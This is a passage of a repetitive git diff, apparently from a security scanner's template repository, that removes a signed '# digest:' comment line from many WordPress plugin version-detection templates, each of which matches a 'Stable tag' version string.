a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100962f03a5351bf301d80ae5a0f9b9e01c2ab054da415a44370ad6427f31299f1702205bdc6777df302c7dcbff1a3dcb3494fbc8ee909647f32e78c72480ba4474bc95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index c68ff94eac..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b61e41eb131eb80b8f9f2de153718c9e0f39e584d4f864be15effe5e6144cdad02202eff2c39b08ae67db5f6b37cdd6bda1b25034f6adccd865c23ab344c19f50416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 49c0c2e526..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022001169a2c9ce1024062ef19c27009015ed6c1b0c84d021f803a523a78ebfb0df602206166bbeeb43e1a603661af426cf77f45cf70a21679e9a3f9a0cdfbd8152765c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index fb188ba1c1..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008526aafd366670d5b3a8d7b446524142ebf27432a41f6743679233361b362afd022100f4641e9bea4aff89c8857fb1a4d31732a721eaece1495a160621161b1f3ebfc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 06784bc17f..ce5dc03713 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f5cdf010eaf352befc68a0b40e34c8b6c912e4ac4aa2a88ae4fd0f8797e8a1100220236654d9a818718bce36d92ee0be2bcfbbbefafe94720013cf8a248fb4346584:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 27ad2cd931..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cd98debf0aa5171eacf44991611151370c571ff010656f11bff9175e87b15513022100af8cb9c5f4f430dfbb5334f2977f94b4cc814f7dbc83e4a091b9f16c38246ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index af7e4ee9ac..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205341f5bca0542f6b81762d6f276d8e14c23c85beb745b27ff7bdecc28ed5cb25022060be4b99192e5134039d715b38b9ecbb83c7feaf4afb70c65906ff4954a506b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 2c516011a8..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203effd6b077f409a8e01afbe85cb41cac6bb32882c1bc3fef2a30d82fcc0e511002201676f52a9644d327a28a405d8ca5c0d5f94c76105f2e14bc0d7c9025a3c4ee75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index b01254e7a0..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200d428f69bad1972a910ce3a76765f3d59ea6aa9b04de812affdae6b3be30db65022015ba2d72dd8f5f7c84c8f254b477f57d217a099fabd2f91b0cc459ed6d1b6234:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index ce25127d93..45260ccfba 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022046355682fe33e441a98c5378ec89ceb3e174ddd60c71728f9e914672d8d573db022029e9d5d077380edb5b1df83b742d474024716352069e2d6942f7cbf21875f80c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2986e6f511..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204083f57c7afb9c179fb38d1de35fd110438a5e41fc0d0603a07f3dbd73479e9e022100d26780fa83bfedc3844c32eb9a6ead4d3ae82c7593de840364611d04e0e49121:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index d4de034b0b..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dfeb6d411f10fae4ee5018f965adad42f63be781e66475f3ba67925bc317104e02203e4dcec4accada39c98d53bfb0db3bf17fef409eee108bf0bcb888faed209f4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index efdb0e76ca..64cfced6cf 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210089e76ee15d3071f3c1d701d628c5b0cfc6eadde72412855d8048e745f4a2a612022100fa37d6ce214510d82db368823d989f0219409cb047665547817fb019714408c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 0fe6631434..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220609b81e5390de802185e92aa5271ac9d709a9764d778348bcb13e1125083a57e022003caf973eed82aaf27011546364d71cced9b99fad2052d6777daa0f6b170573c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index b414b48d0d..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008bf5bb57574f65c882e3632188870d86f1aaa8bc564365640445fcce5a42931c02201ba3bae99a48d6e654a9099da6bd4ed1abfe5becf1fe317744a324c0480a0efd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 03795212f9..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ef693c52bf45fd65b1378e46b0ff071f91763124efe5cbfec2dd77a657e84ff02203050173ca2d5275680c0c048e0f9fb3e00780dee2a81ee2f7bebfc6e75919353:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 259e8db909..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220779bed5e2da08e6195437744f6f62d0dd469e6da3583c426257e1a7121d2469302206cff7f3ebd5ce61d54d702281ff712a9d33325ce506fca34dff88a64d74e5dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index f226f3bb6d..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fffa876105d8b5279c8a4999163e6e718d6b1db7e510f8d388357ff6d264323d022100c40012e759d1de99d9893ebbab5c0a582de60659bb1d93a4be1e753e3e4168cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index bd33a60806..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008a05f5ed896fe504a6ee7953a7bee911a137f82eae0f3cea24e947603770de6d0220488242397e8d3e764055c0793ac1b28b3333a8fa927f4d3670cc4ffbdea5bf8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index e0ac611e4d..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e3d4a3e6597495a1e14d53f3bd8d42611c1b1874c03c98f47c12cc7767a1d741022030e1e4342601a65778737b61ddb4696441840d11520163b719e7ce7797605903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index b828b9fa12..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d9fd3a0ec7e87c1aae82a83494bf1932cddf1168d4f2111e32e18c46a83c88e7022100b4270b0bd2240bd66d2d1c2d8a2da48734edb53b914e29ed77338583b0626e20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 1ecfe01f82..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022002d8c8cd94ea87430b90ae7f0d06c9b8689184a57e4c07e54065bf0f623a387d02204f601d199c8b6e25e1d4c1b69d2cbdc11e61c1cd4fc807ab0b07449ee8ce1472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index c5fc805160..4a68323ae1 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205b3977ddcb1096a9466ab952b001ea39b8a68358ecae94f9b5cd83913dabf63d02202de8a54c3cf8c2b09b462f5280d1e49b529b9c46cf29a393a074418eeb3be53a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 0cd402c8bc..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201970eefe2d9cdcc9bd9cb38a98e06bcd881db4d0350b9063804cad3eda73ddf002202b0a61c26aa83c92ff100da4a49cead9a71347b908af788b8828eab748e9a995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 5ec05742bc..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220717443c5a41c49df5494a946be0439e71d757648ce60e863dddb6fc4bf69edc002202917fdf2fdea0adfcd640d02e65f1b2e5d7d3c3cbd9340ea4f93fbeec8466ad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 92c2ce84e6..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206b053126bd4300213ca86198f070078bee2c34da6bfeda68f17ce8314aa11ef00221009926ffe6ce8d30259238c6e451691360779fddda507806270dce0b7df6b96f0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 86a47e35d0..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b6f3c3c6788836ea559dbc605e010509439e0f31eece0240c21fbcdfe685efc5022100e26e635021c3ed2ecaa314c75bdf273731f2cf9340d79e9d7ca77298f5dbe568:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e70bcb846..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009fea55254f6f4278467a01476b4554739763130581538bff0abd629b3f670a5202203fb398e6bc15a43ab9d424cc7b0f044d191f1799930ad0d73a541b6d5ed216c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index befa58cf87..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ced45a72658d24f23ad2be1ff4e857a044788d6033441e71d924efd4026b9c49022100e23b27e51a1b6d8956ac1aa590ee4cbf266d0f53bd0f610574effb05339f62f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 3e04bc3565..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204b9ec5bf72a1bfc86ebe041dcaa0fd7b2e59f267653e9f0ab2b0b6e1b3b92f43022100e2a35a9b9f68943d6d04a0b45f2e7dcb0347b99c0650ff4aee46d74b81838227:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 234183a770..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210096c34559c8d26c5b6c5a590756945b6d0ef12d930e79d5ea3b96a70674904ca802204d73115553a45cd6fca931ed47cf2fcbe06c0f34b95c224c16073c0f0c1dcf56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 9f7ff8e0ea..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a1e1b11a4833bf74551b7c96f1408d39ea1c289c69a4e5b3c972bbb9b5d0a59602210081e457996d9d2a53bce278e0ef2ce9dade06c2b75e54ca71433a89509b0810f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 0d55c5e3a8..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009b744c98bcb952ec3b86731b5d003dded10269280af1f7fd60761d54e5d224b20220653955da26338c58cf3b05268b59a4a13c2536951fc43a70ff00820be5e1655e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 693111b1ab..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a65d6d1903e32446c009af45aca679dfd4ae0d2b4491af444f0050470f67b1e5022100e4cb2f88d0bcd63c8e6b84c32570646873c0c91f718164e21fe47e004f8ec218:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 24c11df4f4..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c29332c8eda8c3237eb3e749a23c0ccd80db61273a42546136accdff321d3ab022052659eb144585c56ed79334d07012d3cd158b07b645e9eaf83518a39f99163c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index b5fee0378f..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201db30d7bdd18030516ed4171471e71652da84815d0e9421ae89fbeac8e8ce9fe022027a82e5c3cb7e6459cb22aa196651bd8640b2a994cf6d181c0def635820ccf13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a1f60e6bdc..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210099c5a6564964e941ee739d394495f8a98da4078859859a04efc23cd609dbde9102206389a516bd974664486896962d7aa409d66808b09bdb33104d932980f9613a93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 994712d860..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee2f123e81e08adab437821a0fe342ae3c2f29911aef095aa1613c8d507b2433022011696d1ef1bea0a4cc2e13eb0777078fd601aef8f866cdc93187314e771df22e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 9768101dfd..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022069ec8beda9d5f39d417ccabf25528abb667b5d3d0bfb2ab18e33c9449039851c0220674d6ea1252a3441767381288506161c281dec9c8e4448710cd4e4f5dc09f293:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5bcbbd8658..ed3161d27c 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203adfb08db486963a38386df8b571d71b0d4d19f30826c49221bba42b8c07283602201ccbb2db1a49db991a26cde703e00fd26f1eeb69fa9bc89b4431f9f87643bcb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index bbdf0f0346..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fa5c02efc86ad2c998af0a94cebfbb27189d581b4a0f2b857170a650810fb5e7022100a6d23c2d13e9658d610fd791e05d17004a566f742fa9a5fd79ea89ebe42dd22d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index bbcf73f3b5..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022007f286e26d27da5823e26020536f5c10f6a5ed2df36339176869f70970e44687022100ebfb3bc3c9aa4275797f4a8eed625fc5fe0787f00ee43a302bc77d0efb329ad0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 391b815616..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200e70e674d601b1eeece68668dfa93023194a1a938cc0a082bbbf94d86125f2cc022100bdb4d346382dd1c0689e4dce866c1958190441ba806429151e1213e6e4a6d3fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 6affa96e03..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200bff490b16c42369f7aa45804cbd60738d10b568bffc3826c4e62b2ab57eefe4022100aae04d7c05512dd51715c0cc5165f6ac7cea5af153a8f8e5b68f538b7846ec7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 006d31f427..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220209f736da5f6cd91328078ec549fdfaa480dc13d0b484d759f0fbb3fc68996e80220364bf16a2b9539754346c98da2a76481dd1ac9e1c9351b47ff1b479812a36c1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 48e945c2aa..540d535ecc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e4c202b0dceedc4d57e2188b985b64469f602b96b8edd955ec13ff6e83b9d45402205cd9e2cfb4cdbc5a7be27a467f9468f61c284c4d9628d4e43d237f416accd4e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index e1372151fe..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e1267a3cc80755615797970f49c26752aeb8cf26a64be04bd44ac57f6ed31da00220681596b87c75c9547c3c8719f5ace26a1d244c719774e03e7bd7665c8fccee2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 452342be9b..d69709b8f9 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 